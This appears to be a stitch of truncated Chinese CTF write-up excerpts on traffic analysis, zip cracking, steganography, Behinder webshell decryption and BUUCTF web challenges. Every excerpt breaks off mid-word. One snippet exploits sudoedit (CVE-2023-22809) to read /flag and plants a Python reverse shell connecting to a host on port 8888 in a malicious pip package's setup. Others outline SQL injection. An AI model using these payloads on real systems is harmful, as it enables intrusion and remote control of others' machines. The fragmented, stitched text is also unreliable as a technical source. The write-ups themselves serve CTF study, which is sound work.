考点流量分析,TLS,二维码修复解题步骤首先速览一遍帮帮小明.pcapng,发现里面的协议有IMAP和TLS,这部分可能有线索打开统计->会话,TCP栏有两个终点为25端口的地址,追踪流量,是两次对话发现一个压缩包保存,发现有密码,里面是一个加密后的文件mosaic.bmp,用zipcenop排除了伪加密的可能性,所以密码应该在另一个tcp流中发现一段明文,用的gb2312编码,用vscode打开:害,怎么密码忘了呢,只能往后面慢慢找了最后在某个TLS流找到了密码cAn_yOU_hElp_mE解压压缩包,得到图片mosaic.bmp还好队友见过原题,直接把脚本放了上来,参数甚至一点没变就可以用
最近遇到一道CTF的一道题,大意是:一个被压缩的Zip压缩包,在无法使用加密口令解压的情况下,如何获取其中文本文件的内容。思路:对于文件大小我自己做了一个压缩包,没有使用密码加密,测试一下(以4字节的文件为例):frombinasciiimportcrc32importstringimportzipfiledic=string.printabledefCrackCrc(crc):foriindic:#print(i)forjindic:forpindic:forqindic:s=i+j+p+q#print(crc32(bytes(s,'ascii'))&0xffffffff)ifcrc==(c
这是神马考点:冰蝎流量特征数据包,需要解密emoj解密冰蝎之前做过特征就是先base64编码在AES编码我们在数据包里面找到了密钥:144a6b2296333602这里我们知道了密钥我们就去解密先筛选HTTP协议导出HTTP数据流可以看到传了shell.php随便找一个然后复制,AES解密这里我没工具就网站吧一样的最好找个好点网站不然解不出在线AES解密:http://tools.bugscaner.com/cryptoaes/QG后面的继续Base64解密然后可以看到源码然后cmd里面的在Base64解码得到命令如下:cd/var/www/html/upload/../;tar-czvf-f
签到flag{buu_ctf}第二题下载下来zip解压发现个gif图片,用Stegsolve.jar打开aaa.gif图片,依次点击analyse——>frameBrowserflag{he11ohongke}二维码下载解压发现一个二维码用CQR扫一下发现没有flag用binwalk进行分析看看有没有隐藏文件发现有个4number.txt文件然后进行分离得到一个zip解压发现需要密码我们利用ARCHPR.exe进行爆破得到密码:7639解压打开4number.txt得到CTF{vjpw_wnoei}你竟然赶我走下载文件解压得到一个图片打开查看hex在结尾得到flagflag{stego_is_
前言:当时比赛没有做出来现在来复现一下就当记录一下(这个思路没想到)BlackMamba:一张图片常规得分离,属性,LSB,盲水印等都尝试过无果!考点:异或解密(第一次遇到,没想到)这里放入010发现底部有沉余字符,与十进制24异或,得到压缩包这里得到压缩包然后我们使用APCH或者Ziperello爆破得到密码:1qaz@WSX这应该是一种编码咱也不知道直接随波逐流一下!德沃夏克键盘Dvorak解码(第一次见到)DASCTF{KOBE_BRYANT_8_24}总结一下:就是还是得多做题做misc思路很重要下次在遇到这种就可以多一种尝试方法了!
目录0x01 [SUCTF2019]EasySQL1(介绍2种解法)0x02 [GXYCTF2019]PingPingPing10x03 [极客大挑战2019]SecretFile10x04 [极客大挑战2019]LoveSQL10x05 [极客大挑战2019]Http1说明:本文持续更新BUUCTF平台上web的题解WP,请持续关注……0x01 [SUCTF2019]EasySQL1(介绍2种解法)1、审题打开靶场后,是一个POST表单,变量名为query(可查看源代码或BurpSuite抓包获取变量名),如下:2、解法一常规办法判断注入点及注入类型,发现回显是Nonono,猜测单双引号、u
状态简写状态状态说明WWait没有人做这道题,你可以开始尝试SStuck题目做到一半思路卡壳FFinished完成该题1FirstBlood获得一血2SecondBlood获得二血3ThirdBlood获得三血LLackWP完成并缺少WPMisc1.F|color|题目说明:这些毫无规律的颜色中隐藏着怎样的小世界呢?解题思路:我不知道啥时候比赛,别人来问我题目我才知道的,然后就上线了,不然这题估计我一血应该没哈问题。下载好了题目,就是一张png的题目,这个像素这么多,而且无规律的颜色中,很显然就是颜色频率了。其他颜色平均都在700~800左右,直接把序号写上去,提取一下就出来图片,然后扫描二维
sudoCVE-2023-22809没有vimvi,就用原生编辑器nanoEDITOR='nano--/flag'sudoedit/etc/GAMELABpiphack可以下载任意包,考虑构造恶意的包,让他去下载直接在setup下写反弹shellimportos,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx',8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subproce
目录写在前面一、暴力破解Basic-3-Brute11.解题思路2.BurpSuite工具使用简介二、基于GET的SQL注入Pre.使用校园网做题时可能遇到的小问题2.1Basic-4-SQLcourse1(sql注入)1.解题思路2.2Basic-8-sqli-labs(sql注入的各种攻击形式)1.报错注入less-1(`Error-Based``单引号``字符型`注入)其他类似题目(less2-less4)2.XPath注入less-5(Doubleinjection)1.使用XPath注入其他类似题型3.文件导出less-7dumpintooutfile(文件导出)1.布尔盲注爆破获得
一·隐写术的介绍隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文叫做Steganography,来源于特里特米乌斯的一本讲述密码学与隐写术的著作Steganographia,该书书名源于希腊语,意为“隐秘书写”。二.图片隐写1.常用工具HexWorkshopStegsolveBinwalkdd命令2.查看十六进制,用HexWorkshop将图片打开,搜索flag等关键字或翻到最后,可能会出现flag3.右键属性,查看详细信息,可能会隐藏flag。 4.将文件后缀名改为zip或rar,图片可能会变成压缩包。正常的